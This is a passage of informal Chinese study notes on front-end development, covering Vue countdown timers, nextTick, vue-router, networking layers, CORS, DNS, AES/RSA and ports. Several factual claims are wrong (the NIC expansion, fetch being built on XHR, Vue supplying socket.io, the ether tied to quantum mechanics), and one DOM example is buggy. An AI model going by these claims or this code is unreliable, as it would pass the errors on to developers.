  var days = (until - date) / 1000 / 3600 / 24;
  // 下面都是简单的数学计算
  var day = Math.floor(days);
  var hours = (days - day) * 24;
  var hour = Math.floor(hours);
  var minutes = (hours -
hour) * 60; var minute = Math.floor(minutes); var seconds = (minutes - minute) * 60; var second = Math.floor(seconds); var back = '距离2018年还剩下' + day + '天' + hour + '小时' + minute + '分钟' + second + '秒'; return back; } function countDownFun(time) { time--; //时间一秒秒的减 let nowTime = new Date().getTime(); //现在时间 if (nowTime <= time) { //获取时间差 let timediff = Math.round((time - nowTime) / 1000); //获取还剩多少天 let day = parseInt(timediff / 3600 / 24); //获取还剩多少小时 let hour = parseInt((timediff / 3600) % 24); //获取还剩多少分钟 let minute = parseInt((timediff / 60) % 60); //获取还剩多少秒 let second = timediff % 60; return day + '天' + hour + '小时' + minute + '分' + second + '秒'; } else { return '00天00小时00分00秒'; } } export default { name: 'meizhoupintuan', async created() { let data = await home_meizhou_api(); this.list = data.data.list; this.timer(); }, data() { return { list: [], temp: null //倒计时初始 }; }, methods: { timer() { //页面多个定时器 //主要逻辑都在这页面更新 let _that = this; this.temp = setInterval(() => { this.list.forEach((item, index) => { item.dayTime = countDownFun(item.endAt); this.$set(this.list, item.dayTime, countDownFun(item.endAt)); console.log(this.temp, '6'); }); }, 1000); } }, destroyed() { //切记页面销毁需要销毁 clearInterval(this.temp); console.log(this.temp, '销毁'); } }; ``` ```js // 页面倒计时,经常因为是否激活当前页,页面任务是否阻塞导致倒计时不准确,如何实现一个精确的倒计时呢? 
// 模拟线程占用 setInterval(function(){ var j = 0; while(j++ < 100000000); }, 0); let timer = null; let interval = 1000; let count = 0; let startTime = Date.now(); let leftTime = 50000; // 剩余时间一般从服务端获取 if (leftTime >= 0) { timer = setTimeout(startCountDown, interval); } function startCountDown() { count++; // 时间偏移量,此刻时间与理想时间的偏差 let offset = Date.now() - (startTime + count * interval); let nextTime = interval - offset; if (nextTime < 0) nextTime = 0; leftTime -= interval; // 剩余时间减少 console.log(`误差:${offset}ms,下一次执行:${nextTime}ms后,距离开始还有:${leftTime}ms`); if (leftTime <= 0) { clearTimeout(timer); } else { timer = setTimeout(startCountDown, nextTime) } } ``` 两种方式更新时间: - 通过设置computed,cache = false,再通过setInterval去获取,相当于迂回 - ***$nextTick原理*** 参考:[nextTick:MutationObserver只是浮云][nextTickAndMutationObserverUrl] 这句话很重要:**每轮次的event loop中,每次执行一个task,并执行完microtask队列中的所有microtask之后,就会进行UI的渲染。**,因为nextTick的原理就是基于此。 因此如果想获取数据更新后的dom,只需要触发一个微任务,当微任务执行完就会开始更新dom,因此在微任务的回调里就可能拿到最新的dom元素。。。但微任务又有好几种或者没有(只能退而求其次改为宏任务) 常见的宏任务(macro task): setTimeout、MessageChannel、postMessage、setImmediate; 常见的 micro task 有 MutationObsever 和 Promise.then。 栈(stack)分配固定大小内存(存放指针及基本数据类型)先进后出模型(比如浏览器history),系统自动回收内存。堆(heap)是动态分配内存大,不自动回收。队列是先进先出模型(FIFO)。 ```js // 其实MutationObsever是用来监听DOM修改事件,能够监听到节点的属性、文本内容、子节点等的改动等 // 监听到改动,就会执行里面的回调 // ios9.3以上的WebView的MutationObserver有bug, // 所以在hasMutationObserverBug中存放了是否是这种情况 if (typeof MutationObserver !== 'undefined' && !hasMutationObserverBug) { var counter = 1 // 创建一个MutationObserver,observer监听到dom改动之后后执行回调nextTickHandler var observer = new MutationObserver(nextTickHandler) var textNode = document.createTextNode(counter) // 调用MutationObserver的接口,观测文本节点的字符内容 observer.observe(textNode, { characterData: true }) // 每次执行timerFunc都会让文本节点的内容在0/1之间切换, // 切换之后将新值赋值到那个我们MutationObserver观测的文本节点上去,进而就会触发回调nextTickHandler // nextTickHandler就是我们指定的要在更新以后的dom上的操作函数 timerFunc = function () { counter = (counter + 1) % 2 textNode.data = counter } } ``` 
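基于上面的原理,可以写一个极简的 nextTick 雏形(仅为示意,并非 Vue 源码;`nextTick`、`flushCallbacks` 这些函数名是这里假设的命名):回调先收集进队列,同一轮事件循环只注册一次微任务,等微任务触发时统一冲刷队列:

```js
// 极简 nextTick 示意:回调入队,借 Promise 微任务统一冲刷
const callbacks = []
let pending = false

function flushCallbacks () {
  pending = false
  const copies = callbacks.slice(0)
  callbacks.length = 0
  copies.forEach((cb) => cb())
}

function nextTick (cb) {
  callbacks.push(cb)
  if (!pending) {
    // 同一轮事件循环里多次调用,只注册一次微任务
    pending = true
    Promise.resolve().then(flushCallbacks)
  }
}

// 同步代码先执行完,队列里的回调才在微任务阶段依次执行
const order = []
nextTick(() => order.push('a'))
nextTick(() => order.push('b'))
order.push('sync')
// 微任务冲刷后 order 为 ['sync', 'a', 'b']
```

真正的 Vue 实现还要处理微任务不可用时降级为宏任务、iOS UIWebView 的坑等,见下面的源码。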
**注意:**在Vue2.4之前都是使用microtasks,但是microtask的优先级过高,在某些情况下可能会出现比事件冒泡更快的情况,但如果都使用 macrotasks 又可能会出现渲染的性能问题。所以在新版本中,会默认使用 microtasks,但在特殊情况下会使用macrotasks,比如 v-on。 对于实现 macrotasks ,会先判断是否能使用 setImmediate ,不能的话降级为 MessageChannel ,以上都不行的话就使用 setTimeout。。。然后对于微任务的话,优先使用Promise.resolve().then,如果不支持的话,就退回到宏任务 ```js /* @flow */ /* globals MessageChannel */ import { noop } from 'shared/util' import { handleError } from './error' import { isIOS, isNative } from './env' const callbacks = [] let pending = false function flushCallbacks () { pending = false const copies = callbacks.slice(0) callbacks.length = 0 for (let i = 0; i < copies.length; i++) { copies[i]() } } // Here we have async deferring wrappers using both microtasks and (macro) tasks. // In < 2.4 we used microtasks everywhere, but there are some scenarios where // microtasks have too high a priority and fire in between supposedly // sequential events (e.g. #4521, #6690) or even between bubbling of the same // event (#6566). However, using (macro) tasks everywhere also has subtle problems // when state is changed right before repaint (e.g. #6813, out-in transitions). // Here we use microtask by default, but expose a way to force (macro) task when // needed (e.g. in event handlers attached by v-on). let microTimerFunc let macroTimerFunc let useMacroTask = false // Determine (macro) task defer implementation. // Technically setImmediate should be the ideal choice, but it's only available // in IE. The only polyfill that consistently queues the callback after all DOM // events triggered in the same loop is by using MessageChannel. 
/* istanbul ignore if */ if (typeof setImmediate !== 'undefined' && isNative(setImmediate)) { macroTimerFunc = () => { setImmediate(flushCallbacks) } } else if (typeof MessageChannel !== 'undefined' && ( isNative(MessageChannel) || // PhantomJS MessageChannel.toString() === '[object MessageChannelConstructor]' )) { const channel = new MessageChannel() const port = channel.port2 channel.port1.onmessage = flushCallbacks macroTimerFunc = () => { port.postMessage(1) } } else { /* istanbul ignore next */ macroTimerFunc = () => { setTimeout(flushCallbacks, 0) } } // Determine microtask defer implementation. /* istanbul ignore next, $flow-disable-line */ if (typeof Promise !== 'undefined' && isNative(Promise)) { const p = Promise.resolve() microTimerFunc = () => { p.then(flushCallbacks) // in problematic UIWebViews, Promise.then doesn't completely break, but // it can get stuck in a weird state where callbacks are pushed into the // microtask queue but the queue isn't being flushed, until the browser // needs to do some other work, e.g. handle a timer. Therefore we can // "force" the microtask queue to be flushed by adding an empty timer. if (isIOS) setTimeout(noop) } } else { // fallback to macro microTimerFunc = macroTimerFunc } /** * Wrap a function so that if any code inside triggers state change, * the changes are queued using a (macro) task instead of a microtask. 
*/ export function withMacroTask (fn: Function): Function { return fn._withTask || (fn._withTask = function () { useMacroTask = true const res = fn.apply(null, arguments) useMacroTask = false return res }) } export function nextTick (cb?: Function, ctx?: Object) { let _resolve callbacks.push(() => { if (cb) { try { cb.call(ctx) } catch (e) { handleError(e, ctx, 'nextTick') } } else if (_resolve) { _resolve(ctx) } }) if (!pending) { pending = true if (useMacroTask) { macroTimerFunc() } else { microTimerFunc() } } // $flow-disable-line if (!cb && typeof Promise !== 'undefined') { return new Promise(resolve => { _resolve = resolve }) } } ``` ***diff算法原理*** 虚拟dom对应的就是真实dom,使用`document.createElement`和`document.createTextNode`创建的就是真实节点。 我们可以做个试验。打印出一个空元素的第一层属性,可以看到标准让元素实现的东西太多了。如果每次都重新生成新的元素,对性能是巨大的浪费。 ```js var mydiv = document.createElement('div'); for(var k in mydiv ){ console.log(k) } ``` 虚拟dom可以理解为简单的对象去代替复杂的对象,virtual dom很多时候都不是最优的操作,但它具有普适性,在效率、可维护性之间达平衡。 vitrual dom另一个重大意义就是提供一个中间层,js去写UI,安卓或ios之类的负责渲染,就像rn一样 vue的diff算法来源于`snabbdom`,复杂度为O(n),这点和react一样。diff的过程就是调用patch函数,就像打补丁一样修改真实的dom 参考:https://juejin.im/post/5affd01551882542c83301da 在浏览器里还可以直接先生成代码片段,等代码片段都生成完了,在插入页面: ```js var fragment = document.createDocumentFragment() var myUl = document.createElement('ul') for(let i = 0; i<10;i++){ let myLi = document.createElement('li') myLi.innerText = 'test li' myUl.appendChild(document.createElement('li')) } element.appendChild(fragment.appendChild(myUl)) // 如下命令会创建一个新的空白的文档片段( DocumentFragment)。 document.createDocumentFragment(); // DocumentFragments 是DOM节点,但它们不是主DOM树的一部分 // 因为文档片段存在于内存中(其实这文档就存在于内容中,不用再特殊操作内存什么的了),并不在DOM树中,所以将子元素插入到文档片段时不会引起页面回流(对元素位置和几何上的计算)。 // 因此,使用文档片段通常会带来更好的性能。 // 还可以根据当前元素,插入一个新的元素,而且插入的位置也是围绕调用这个方法的元素 // 参数一就是要插入的位置,参数二就是待插入的元素 element.insertAdjacentElement(position, element); // postion有四个值 // 'beforebegin': 在该元素本身的前面. // 'afterbegin':只在该元素当中, 在该元素第一个子孩子前面. // 'beforeend':只在该元素当中, 在该元素最后一个子孩子后面. // 'afterend': 在该元素本身的后面. 
``` ***vue-lazyload原理*** 参考:[vue-lazeload原理][vueLazeloadTheoryUrl] 1. vue-lazyload是通过指令的方式实现的,定义的指令是v-lazy指令 2. 指令被bind时会创建一个listener,并将其添加到listener queue里面, 并且搜索target dom节点,为其注册dom事件(如scroll事件) 3. 上面的dom事件回调中,会遍历 listener queue里的listener,判断此listener绑定的dom是否处于页面中perload的位置,如果处于则加载异步加载当前图片的资源 4. 同时listener会在当前图片加载的过程的loading,loaded,error三种状态触发当前dom渲染的函数,分别渲染三种状态下dom的内容 ***vue组件初始化原理*** 比如首先来看vue-router的使用步骤: ```js // 1 引入vue-router import VueRouter from 'vue-router' // 2 利用vue的插件机制,加载vue-router Vue.use(VueRouter) // 3 实例化VueRouter const router = new VueRouter({ routes }) // 4 实例化Vue const app = new Vue({ router }).$mount('#app') ``` **Vue的插件机制**,先来看看源码: ```js Vue.use = function (plugin: Function | Object) { const installedPlugins = (this._installedPlugins || (this._installedPlugins = [])); if (installedPlugins.indexOf(plugin) > -1) { return this; } // additional parameters const args = toArray(arguments, 1); args.unshift(this); if (typeof plugin.install === 'function') { plugin.install.apply(plugin, args); } else if (typeof plugin === 'function') { plugin.apply(null, args); } installedPlugins.push(plugin); return this; } ``` 该方法首先检查插件是否已经加载,如果已经加载,直接返回 this。 如果没有加载过,会取所有的参数,并将 this 放在第一个。优先执行 plugin.install 方法,若不能执行,则直接执行 plugin 自身。 最后将 plugin push 到插件列表中。 既然插件有install方法,那这个install方法做了什么呢? 实际上vue-router对外export了一个VueRouter的类,这个类上包含了router的各种方法,比如install。install函数里又调用Vue的方法注册mixins,components,生命周期等。。。因此这个插件里的各种方法才可以直接使用。。。 **注意:**其实vue的各种插件也可以理解为组件,比如上面的vue-router是专注于路由管理的组件,axios是专注于http请求模块的。 ***vue-router原理*** 我们都知道Ajax可以实现页面的无刷新操作,但是,也会造成**无法前进后退**。。。到了h5之后,当执行ajax操作的时候,可以向浏览器history中塞入一个地址(如:pushState,无刷新),返回的时候通过url或其他传参,就可以回到ajax之前模样,也就解决了刷新和后退的问题了。。。 本质上就是监听URL的变化,然后匹配路由规则,显示相应的页面,并且无需刷新。。。单页应用一般使用`hash`,`history`模式,非浏览器环境还有`abstract`模式 路由变更到视图变更的过程: 1. hashchange 2. match route 3. set vm_route 4. <router-view> render() 5. 
render matched component #### ***网络模型及协议相关*** ***网络模型*** - ISO: international Origanization for Standards (国际标准化组织) - OSI: open Systems Interconnection(开发式通信系统互联参考模型) - IETF: Internet Engineeering Task Force(非国家或国际机构等公共机构所制定的标准,但属于业界公认的标准),制定了TCP/IP - TCP/IP:最初的网络鼻祖ARPANET(阿帕网),是大学的项目,只是军事正好也需要,因此助推了网络的逐渐成型,而tcp/ip的成型源于UNIX实现了初版的TCP/IP协议,后来才慢慢被阿帕网采用,并推广,最后成为了互联网。 - ISP: 等到网络出来后,就诞生了提供互联网接入服务的公司(internet service provider) - 以太网:在爱因斯坦提出量子力学之前,人们普遍认为宇宙内充满以太,并以波的形式传送光。而以太网规范简单,易于网卡及驱动程序的实现,且以太网网卡比较便宜,因此得以普及。以太网是一种通信方式,还是需要电缆进行传输信号的。计算机内部采用二进制 1K = 1024,1M = 1024K;而在以太网中以时钟频率决定传输速度,二者并不同,1k = 1000,1M = 1000K。以太网有自己的数据格式(阮一峰的帧) - 无线通信,通过电磁波,红外线、激光等传输信号;Wi-Fi(wireless fidelity)高质量的无限lan。蓝牙也是一种 1. **实体层**传输0和1; 2. **链路层**通过mac地址广播传输数据帧(标头和数据); 3. **网络层**,路由器(DHCP)分发ip,配置子网掩码,ARP根据ip(域名解析)反解析mac地址; 4. **传输层**根据端口确定是哪个具体应用程序接收数据,udp和tcp为数据传输保驾护航,tcp三次握手四次挥手(效率低); 5. **应用层**规定传输的数据的具体格式,如html,邮件等 - 网络接口卡(NIC,network information center):也叫网络适配器、网卡、LAN卡; - 中继器:处在OSI的物理层,物理层面上延长网络的设备,其实就是将电或光信号调整波形和放大再传给下一个电缆。 - 网桥:处在OSI的数据链路层,连接两个网络的设备。有些网桥能判断是否将数据报文转发给相邻的网段,这种网桥被称为自学式网桥。交换集线器(Hub)也是网桥的一种,交换集线器中连接电缆的每个端口都能提供类似网桥的功能。可以认为交换机的每个端口实际上提供着网桥的功能。 - 路由器在OSI的网络层,连接两个网络,并对分组报文进行转发的设备。网桥根据物理地址转化,而路由器则是根据ip地址进行处理。有的路由器不但可以分担网络负荷,还具备一定的网络安全的功能。 - 网关,负责从从传输层到应用层的数据进行传输和转发的设备,还负责数据转换,在两个不能直接通信的协议之间进行翻译,最终实现通信。有时为了客户端和服务端无需直接通信,中间加一个代理或者防火墙,这些其实都是网关的一种。 - IP(internet protocol) 子网掩码的作用是标识出在 32 比特的 IP 地 址中,从哪一位到哪一位是网络地址,从哪一位到哪一位是主机地址。网掩码中,值为 1 的那些位对应着 IP 地址中的网络地址,后面 值为 0 的那些位则对应着主机地址。 虽然在这个对话框中可以手动设置 IP 地址和子网掩码,但是大多 数情况下选择的还是“自动获得 IP 地址”这个选项。这个选项使得计 算机在启动时会去从 DHCP(Dynamic Host Configuration Protocol(动态主机设 置协议) 服务器获取 IP 地址和子网掩码,并自动地 配置它们。 TCP/IP 这个词表示在网络上 同时使用了 TCP 和 IP 这两种协议。正如前面所讲解的那样,IP 协议 用于指定数据发送目的地的 IP 地址以及通过路由器转发数据。而 TCP 协议则用于通过数据发送者和接收者相互回应对方发来的确认信 号,可靠地传输数据。通常把像这样的数据传送方式称作“握手”,(Handshake)(如图 9.13 所示)。TCP 协议中还规定,发送者要先把原 始的大数据分割成以“包”(Packet)为单位的数据单元,然后再发送, 而接收者要把收到的包拼装在一起还原出原始数据。 例如,诸位敲打键盘输入的电子邮件 正文等数据,并不是原封不动地发送出去的,而是先通过实现了 TCP 协 议的程序附加上遵守 TCP 约束所需的信息,然后再通过实现了 IP 协议 的程序,进一步附加上遵守 IP 
约束所需的信息。实际上计算机发送的 是以包为单位的、附加了各种各样信息的数据 硬件上发送数据的是网卡。在网卡之上是设备驱动程序(用于控制 网卡这类硬件的程序),设备驱动程序之上是实现了 IP 协议的程序,IP 程序之上则是实现了 TCP 协议的程序,而再往上才是应用程序,比如 Web 或电子邮件。这 **http1.1:**默认持久连接,但有队头阻塞问题(可同时发送多个,但响应则是挨个响应,若是第一个慢则会阻塞后面的); **http2而不是http2.0**,因为标准委员会不打算发布子版本,下一个版本直接就是http3 **http2特性:**请求头和体都是二进制;头信息压缩;多工(服务端也可发送请求)且没队头阻塞;数据流,有标识且可设置优先级,还可关闭某个请求而不是整个tcp连接; 什么是多路复用:我们知道http1.x中,我们可以并行请求的,但是浏览器对于一个域名的并行请求是有上限的(chrome,firefox上限是6个),因此如果一个静态资源站,如果想并行下载很多资源,则会有瓶颈。。。而http2在一个tcp连接内可以发送n个http请求,通过提高并发,从而减少tcp连接的开销。 如何开启http2:具体不太清楚,但我想着http2请求浏览器是支持的,因此只要服务端配置了,nginx提供了两种方法,第一种是升级操作系统,第二种是从源码编译新版本的nginx [请求头和响应头一览](http://tools.jb51.net/table/http_header) 路由器有不同的厂家,不同的厂家,其登录界面(其实就是路由器ip,不过有的厂商也会提供一个域名)不同,然后还有一个默认的登陆后台地址的密码。参考:[常见路由器ip及登录密码](https://baijiahao.baidu.com/s?id=1618518205215559854&wfr=spider&for=pc)。 路由器: - WAN口,连接猫 - LAN口,连接具体要上网的设备,比如通过网线上网的电脑 - 电源 - 重置,有时候如果登陆密码什么忘记了,可以重置,一般按住3s以上,有的提示灯会全亮 ADSL是宽带连接的一种常用方式。ADSL实际上是电话线拨号上网,通过调制解调器进行数据处理后来,再链接到英特网上去。宽带的范畴比ADSL的大,宽带的连接方法不单单只有源ADSL这一种模式,它包括光纤、xDSL(ADSl、HDSL)、ISDN等。 光纤是细细的线,需要猫转换,然后再给路由器,然后才是上网设备。 路由器虽然看起来就是个小盒子,可实际上是一台神奇的计算机。 分布在世界各地的 LAN 中的路由器相互交换着信息,互联网正是由于 这种信息的交换才得以联通。这种信息被称作“路由表”,用来记录应 该把数据转发到哪里 - 通常把在一栋建筑物内或是一间办公室里的那种小规 模网络称作 LAN。与此相对,把互联网那样的大规模 网络称作 WAN(Wide Area Network,广域网)。 - “集线器”(Hub)是负责把各台计算机的网线相互连接在一起集线设备 - “路由器”(Router)是负责把公司内的网络和 互联网连接起来的设备。 - 可以查看路由表(route),还可以查看dns(nslookup)寻址表 通常把在一栋建筑物内或是一间办公室里的那种小规 模网络称作 LAN。与此相对,把互联网那样的大规模 网络称作 WAN(Wide Area Network,广域网)。 VLAN(Virtual Local Area Network),在进行网络管理的时候,时常遇到分散网络负载、变换部署网络设备的位置等情况,此时就得修改网络的拓扑结构以及硬件线路的改造,然而使用VLAN就不需要,只需要网络的结构即可。 **http库** 最开始要实现异步加载数据但不重载页面,需要使用原生`XMLHttpRequest (XHR)`对象,但兼容性和易用性方面都不理想,因此出现ajax(异步js和xml)对其进行了初步的封装(注意ajax是一项技术),后来又有了jequry对ajax进行了封装,使得兼容性和易用性更加完善。fetch是基于XMLHttpRequest (XHR)直接修改的,对现代的 `Promise,generator/yield,async/await`友好。 `Axios`是一个基于`XMLHttpRequest`而构建的现代JavaScript库,除了支持es6还原生支持promise,还有以下突出特点: - 拦截请求和响应。 - 使用promise转换请求和响应数据。 - 自动转换JSON数据至对象。`JSON.parse( '{"result":true, "count":42}') => {result: true, count: 42}` - 
取消实时请求。(这个请求在network里看不到cancel标识,如果用XMLHttpRequest直接取消则可以看到)
- 支持浏览器及node。(可通过判断有无XMLHttpRequest和process进程来区分是浏览器还是node环境)

另外还有SuperAgent和Request等http库。[参考][SuperAgentAndRequestUrl]

**插曲:X-Requested-With**

前面了解了ajax及各种http库,其实底层都是基于XMLHttpRequest,可以统一理解为异步ajax请求;但还有一种请求是同步请求,比如网页同步请求的js、css、图片文件等,这些请求就是基于http或https协议来传输文件,也就可以理解为传统的http请求。

`X-Requested-With: XMLHttpRequest`作为一个非标准的标识,多数情况下主要用来区分请求是传统请求还是异步ajax请求。

**跨域**

参考:[九种跨域方式实现原理(掘金)][crossSiteUrl]

同源策略/SOP(Same origin policy)是一种约定,由网景公司1995年引入浏览器,它是浏览器最核心也最基本的安全功能。如果缺少同源策略,浏览器容易受到XSS(Cross-Site Scripting,跨站脚本)、CSRF(Cross-Site Request Forgery,跨站请求伪造)等攻击。所谓同源是指**协议+域名+端口**三者相同,即便两个不同的域名指向同一个ip地址,也非同源。

**关于域名需要注意:**

- .com、.cn、.org等为顶级域名(或一级域名)
- 子域名将顶级域名再细分,因此所有的二级、三级等都是子域名
- www.zh.wikipedia.org中,wikipedia是二级域名,zh是三级域名,www是四级
- 顶级域名上层还有一个根域 .(根服务器全球13台,但也扩展了很多辅助的),默认不显示而已

**注意:**有一种观念是将顶级与一级域名分开,因此`zh.wikipedia.org`中的`wikipedia`就是一级域名,但尚无定论,知道就好。

同源策略限制以下几种行为:

1. Cookie、LocalStorage 和 IndexDB 无法读取
2. DOM 和 Js对象无法获得
3. AJAX 请求异常

**注意以下几点:**

1. 如果是协议和端口造成的跨域问题,"前台"是无能为力的。
2. 在跨域问题上,仅仅是通过"URL的首部"来识别,而不会根据域名对应的IP地址是否相同来判断。"URL的首部"可以理解为"协议、域名和端口必须匹配"。
3. 跨域并不是请求发不出去:请求能发出去,服务器能收到请求并正常响应,只是结果被浏览器拦截了。

你可能会疑问明明通过表单的方式可以发起跨域请求,为什么 Ajax 就不会?因为归根结底,跨域是为了阻止用户读取到另一个域名下的内容,Ajax 可以获取响应,浏览器认为这不安全,所以拦截了响应。但是表单并不会获取新的内容,所以可以发起跨域请求。同时也说明了跨域并不能完全阻止 CSRF,因为请求毕竟是发出去了。

解决方案:

- Jsonp(客户端声明一个函数,服务端将数据传入函数并返回到前端执行,仅GET)
- CORS(cross origin resource share,服务端设置Access-Control-Allow-Origin:*/白名单)
- postMessage(应用在iframe之间场合比较多)
- websocket(是全双工通信,同时可解决跨域)
- Node中间件代理
- Nginx反向代理(翻墙是正向(隐藏客户端),反向是隐藏服务端)
- window.name + iframe(name属性不同页面加载后依旧存在)
- location.hash + iframe
- document.domain + iframe(只适用于二级域名相同情况)

**总结**

1. CORS(需服务端配置)支持所有类型的http请求,是跨域http请求的根本解决方案
2. Jsonp只支持GET请求,Jsonp的优势在于支持老式浏览器,以及可以向不支持CORS的网站请求数据
3. 不管是node中间件还是nginx反向代理,本质都是利用了同源策略只约束浏览器、不限制服务器之间通信这一点

**Socket:**

参考:[什么是socket][whatIsSocketUrl]

我们深谙信息交流的价值,那网络中进程之间如何通信?如每天浏览器浏览网页时,浏览器的进程怎么与web服务器通信?

本地进程间通信(IPC)有很多种方式,如下:

1. 消息传递(管道、FIFO、消息队列)
2.
同步(互斥量、条件变量、读写锁、文件和写记录锁、信号量) 3. 共享内存(匿名的和具名的) 4. 远程过程调用(Solaris门和Sun RPC) 在本地我们可以通过PID来标识唯一的进程,但在网络中则行不通。。。但TCP/IP协议族已经帮我们解决了,ip地址唯一标识网络中的主机,协议+端口则可以锁定主机中的应用程序。因此利用ip地址、协议、端口便可以标识网络中的进程,而网络中进程间的通信则利用这个标识与其他进程进行交互。 使用TCP/IP协议的应用程序通常采用应用编程接口:UNIX BSD的套接字(socket)和UNIX System V的TLI(已经被淘汰),来实现网络进程之间的通信。就目前而言,几乎所有的应用程序都是采用socket,而现在又是网络时代,网络中进程通信是无处不在,因此也可以说:一切皆socket。 既然网络中的进程是通过socket来通信的,那什么是socket呢?socket起源于Unix,而Unix/Linux基本哲学之一就是“一切皆文件”,都可以用`“打开open –> 读写write/read –> 关闭close”`模式来操作。因此**socket是该模式的一个实现方式,socket即是一种特殊的文件,一些socket函数就是对其进行的操作**, ![consultCache](/jsArt/assets/images/js-theory/protocol-relation.png) 再看下图,就可以发现其实`socket是应用层与TCP/IP协议族通信的中间软件抽象层`。在设计模式中,socket其实就是一个门面模式,它把复杂的TCP/IP协议族隐藏在socket接口后面,对用户来说,一组简单的接口就是全部,让socket去组织数据,以符合指定的协议。 ![consultCache](/jsArt/assets/images/js-theory/socket-protocol.png) 其实,人们为计算机通信设计了若干接口,其中三个接口是通用的: 1. 套接字接口(socket interface) 2. 传输层接口(transport layer interface) 3. STREAM 套接字接口位于**操作系统与应用层之间**,如果应用程序想接入TCP/IP协议族提供的服务,就必须使用套接字接口中定义的指令,即socket编程: ![consultCache](/jsArt/assets/images/js-theory/socket-system.png) 前端与后端交互时,一般都使用ajax,但ajax无法实时获取更新的数据,采用轮询方式开销会非常大,且后端也无法主动推送数据给前端。vue提供了socket.io来解决这个问题,一旦数据进行更新,服务端可主动将数据推送至客户端,常用于消息类推送的场景中。 **WebSocket:**一种在单个tcp连接上进行的全双工通讯的协议 感觉webscoket和http2在双向通信方面很像,其实websocket只是基于http1.1建立的一个tcp长连接,进而可以双向传输二进制数据等。但http2只是对HTML、CSS等JS资源的传输方式进行了优化,并没有提供新的JS API,也不能用于实时传输消息。如果需要实时传输消息,现在还是需要SSE,WebSocket等 原生WebSocket API使用起来不太方便,我们使用Socket.io,它很好地封装了webSocket接口,提供了更简单、灵活的接口,也对不支持webSocket的浏览器提供了向下兼容。 ***DNS*** 域名解析有递归和迭代,递归是本地dns服务器去查询,最后将结果返回给浏览器端。而迭代则是浏览器端主动去根,域服务器查询ip与域名的对应关系。 浏览器里也有dns缓存,`chrome://net-internals/#dns`即可查看,但好像只有清除 mac下hosts文件 `cat /etc/hosts` /是根目录,~是用户家目录,因为一个系统下可以有多个用户 **NAT**(Network Address Translation 网络地址转换) **UPnP**(Universal Plug and Play 通用即插即用) 常用的dns服务器地址: - 223.5.5.5 阿里 - 114.114.114.114 电信 - 119.29.29.29 腾讯 - 1.2.4.8 国家某机构 - 8.8.8.8 谷歌 **数据加密和https** 
https无非是身披SSL的http,而SSL加密是发生在应用层与传输层之间,而抓包工具截获的是http传输的数据,也就是应用层的数据,因此通过安装证书可以看到明文信息。https通信保证了客户端到服务端的通信过程是安全的,但如果客户端本地有恶意软件,则无法阻止攻击。

银行系统一般还需要手机令牌,这些手机令牌是用来输入密码用的。也就是说,如果用系统的键盘输入密码,客户端的恶意软件可能拦截到密码,因此银行系统将输入密码的设备独立出来,这样就能阻止客户端上的恶意软件了。

综上:

1. 若只为保证客户端到服务端之间的通信安全,https就足够
2. 若想在客户端也不让用户看到明文,则需要配合另外的AES和RSA加密

AES对称加密

1. 甲方选择某一种加密规则,对信息进行加密
2. 乙方使用同一种规则,对信息进行解密

由于加密和解密使用同样规则(即密钥),因此如何传递密钥便是问题

```js
let CryptoJS = require("crypto-js");
let AES = CryptoJS.AES;

// 原文是一个游离的对象方法,这里改为独立函数;key、iv 需要双方事先约定并传入
function encryptAES (text, key, iv) {
  return AES.encrypt(text, key, {
    iv: iv,
    mode: CryptoJS.mode.CBC, // CBC,CFB,CTR,OFB,ECB
    padding: CryptoJS.pad.Iso10126 // Iso10126,Iso97971,ZeroPadding,NoPadding,AnsiX923,Pkcs7
  }).toString()
}
```

RSA非对称加密

1. 乙方生成两把秘钥(公钥和私钥),公钥是公开的,任何人都可以获得,私钥是保密的
2. 甲方获取乙方的公钥,然后用它对信息加密
3. 乙方得到加密后的信息,用私钥解密

加密和解密可以使用不同的规则,只要这**两种规则之间存在某种对应关系**即可,这样就避免了直接传递密钥。

Native与服务端加密通信过程:

1. 原生端有RSA的私钥和公钥,服务端有RSA的公钥和AES的密钥
2. 服务端用RSA的公钥对AES的密钥进行加密,然后传输给原生端
3. 原生端用RSA的私钥对来自服务端的加密串解析,得到AES的密钥
4. 用这个AES的密钥加密,再通过bridge给h5端。(对于h5端需要与服务端直接交互的,暂时没做处理)

上面安全的前提是,app本身是安全的,若加固被攻克,则安全性全无。。。不过现在借助一些商业软件进行加固已经很难破解了。

如果想再提高安全等级,可以利用一套算法动态生成客户端的RSA私钥和公钥,即使截获了算法,由于是动态生成,也无法重现之前的密钥。这是动态生成层面;还可以动态存储,也就是通过一定的手段,让存储密钥的内存地址动态变化,这样攻击者只能尝试进程注入去获取密钥。

**为何有些https网站不需要证书**:浏览器/操作系统内置了受信任的CA(证书颁发机构)列表,只要网站的证书是由受信任的CA签发的,客户端就不用单独安装证书;只有双向认证(需要客户端证书)的场景才需要用户安装证书。

**数字签名**:私钥做签名,公钥做校验

***CDN延时***

CDN的全称是Content Delivery Network,即**内容分发网络**。CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率(比如火车票代售点)。CDN的关键技术主要有内容存储和分发技术。

参考:[CDN的那些事][aboutCdnUrl]、[CDN回源][aboutCdnHuiYuanUrl]

***schema协议***

URL Scheme使用场景,目前1,2,5使用场景很广,有没有一种熟悉的感觉?

1. 通过小程序,利用Scheme协议打开原生app
2. H5页面点击锚点,根据锚点具体跳转路径APP端跳转具体的页面
3. APP端收到服务器端下发的PUSH通知栏消息,根据消息的点击跳转路径跳转相关页面
4. APP根据URL跳转到另外一个APP指定页面
5.
通过短信息中的url打开原生app

互联网数据中心(Internet Data Center)主要为互联网内容提供商(ICP)、企业、媒体和各类网站提供大规模、高质量、安全可靠的专业化服务器托管、空间租用、网络批发带宽以及ASP、EC等业务。

**CNAME:**当您拥有多个域名需要指向同一服务器IP,可以将其中一个域名做A记录指向服务器IP,其余域名做CNAME记录指向该域名;这样服务器IP变更时,只需修改那一条A记录即可。

***数据流模式***

http协议传输数据时可以选择`Transfer-Encoding: chunked`模式,也就是数据流模式,传输的数据是分块的,而不是一个完整的数据包,对于服务器处理慢的场合尤为适用。

***常见端口号***

- TCP 21端口:FTP 文件传输服务
- TCP 23端口:TELNET 终端仿真服务
- TCP 25端口:SMTP 简单邮件传输服务
- UDP 53端口:DNS 域名解析服务
- TCP 80端口:HTTP 超文本传输服务
- TCP 110端口:POP3 "邮局协议版本3"使用的端口
- TCP 443端口:HTTPS 加密的超文本传输服务

***http协议状态码***

参考:[http状态码(mdn)][mdnHttpStatusCodesUrl]

